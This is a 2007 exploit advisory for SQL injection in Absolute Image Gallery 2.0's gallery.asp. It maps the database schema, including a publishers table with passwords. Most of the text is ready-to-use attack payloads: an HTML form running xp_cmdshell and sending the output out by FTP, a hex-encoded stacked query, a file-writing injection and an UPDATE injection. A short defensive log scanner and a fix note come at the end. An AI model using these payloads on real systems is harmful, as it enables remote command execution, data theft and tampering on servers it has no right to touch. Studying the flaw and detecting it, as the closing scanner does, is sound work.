
aig-mssql.txt

20 Mar 2007 | Reported by UniquE-Key | Type: packetstorm | Source: packetstormsecurity.com

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit. SQL injection issue in the Absolute Image Gallery product by Xigla, released 2007-03-15. The advisory lists various table names and their columns, and includes an MSSQL CMD injection exploit for DBO users.

Code
`Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit  
  
Type :  
  
SQL Injection  
  
Release Date :  
  
{2007-03-15}  
  
Product / Vendor :  
  
Absolute Image Gallery  
  
http://www.xigla.com/absoluteig/  
  
Bug :  
  
http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Script Table/Column Name :  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : articlefiles  
  
fileid  
filetitle  
filename  
articleid  
filetype  
filecomment  
urlfile  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : articles  
  
articleid  
posted  
lastupdate  
headline  
headlinedate  
startdate  
enddate  
source  
summary  
articleurl  
article  
status  
autoformat  
publisherid  
clicks  
editor  
relatedid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : iArticlesZones  
  
articleid  
zoneid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : plugins  
  
pluginid  
pplname  
pplfile  
ppldescription  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : PPL1reviews  
  
reviewid  
articleid  
name  
reviewdate  
review  
comments  
isannonymous  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : publishers  
  
publisherid  
name  
username  
password  
email  
additional  
plevel  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : publisherszones  
  
publisherid  
zoneid  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGcategories  
  
categoryid  
catname  
catdesc  
supercatid  
lastupdate  
catpath  
images  
allowupload  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGimages  
  
imageid  
imagename  
imagedesc  
imagefile  
imagedate  
imagesize  
totalrating  
totalreviews  
hits  
categoryid  
status  
uploadedby  
additionalinfo  
embedhtml  
keywords  
copyright  
credit  
source  
datecreated  
email  
infourl  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : xlaAIGpostcards  
  
dateposted  
postcardid  
imageid  
bgcolor  
bordercolor  
fonttype  
fontcolor  
recipientname  
recipientemail  
greeting  
bgsound  
sendername  
senderemail  
sendermsg  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Table Name : zones  
  
zonename  
description  
template  
articlespz  
zonefont  
fontsize  
fontcolor  
showsource  
showsummary  
showdates  
showtn  
textalign  
displayhoriz  
cellcolor  
targetframe  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
MSSQL CMD Injection Exploit(For DBO Users) :  
  
<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>  
<body bgcolor="#000000">  
<form name="Form" method="get" action="http://localhost/script/gallery.asp">  
<center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>  
<center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center>  
<center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center>  
<tr>  
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>  
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>  
<td>&nbsp;</td>  
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>  
</tr>  
<tr>  
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>  
<td>&nbsp;</td>  
<td>  
<select name="">  
<option value="0">(CMD)</option>  
</select>&nbsp;<br><br>  
<input type="submit" value="Apply"></center>  
</td>  
</tr>  
</table>  
</form>  
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>  
<br>  
<font face="Verdana" size="2" color="#FF0000"><b>[email protected]</b></font>  
<br>  
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Code Injection(For DBO Users) :  
  
Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--  
  
ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--  
  
Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
UPDATE(ALL users) :  
  
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
Tested :  
  
Absolute Image Gallery 2.0  
  
Vulnerable :  
  
Absolute Image Gallery 2.0  
  
Author :  
  
UniquE-Key{UniquE-Cracker}  
UniquE(at)UniquE-Key.Org  
http://www.UniquE-Key.Org  
`
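A defender's view of the requests above, as an added example that is not part of the original advisory: since `categoryid` should only ever be an integer, any `gallery.asp` request whose decoded `categoryid` is not one is worth flagging in the web server log. The log field order, function names and sample lines are assumptions constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Keywords that appear in the advisory's payloads, lower-cased.
PAYLOAD_TOKENS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_makewebtask",
                  "bulk insert", "create table", "declare", "exec", "update")
INT_RE = re.compile(r"-?\d{1,10}")  # the only shape a category id should have

def categoryid_of(query):
    """Decoded categoryid value from a cs-uri-query field, or None if absent."""
    # Split on '&' by hand: the payloads contain ';', which some query-string
    # parsers treat as a separator and would cut the value short.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "categoryid":
            return unquote_plus(value)
    return None

def scan(log_lines):
    """Return (client_ip, value, matched_tokens) for non-integer categoryid hits."""
    # Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    findings = []
    for line in log_lines:
        if line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7 or not fields[4].lower().endswith("/gallery.asp"):
            continue
        value = categoryid_of(fields[5])
        if value is None or INT_RE.fullmatch(value.strip()):
            continue
        low = value.lower()
        findings.append((fields[2], value, [t for t in PAYLOAD_TOKENS if t in low]))
    return findings

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2007-03-20 10:00:01 192.0.2.10 GET /script/gallery.asp action=viewimage&categoryid=12 200",
    "2007-03-20 10:00:07 198.51.100.7 GET /script/gallery.asp action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);-- 200",
    "2007-03-20 10:00:09 198.51.100.7 GET /script/gallery.asp action=viewimage&categoryid=-1%20UPDATE%20table%20SET%20colon%20=%20'x';-- 500",
    "2007-03-20 10:00:12 192.0.2.10 GET /script/default.asp categoryid=abc 200",
]

if __name__ == "__main__":
    for ip, value, tokens in scan(SAMPLE_LOG):
        print(ip, tokens, value)
```

The integer check does the detection; the token list only labels which of the advisory's techniques a hit resembles. Applying the same integer check server-side before the value reaches the SQL string, or binding it as a query parameter, closes the injection point.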
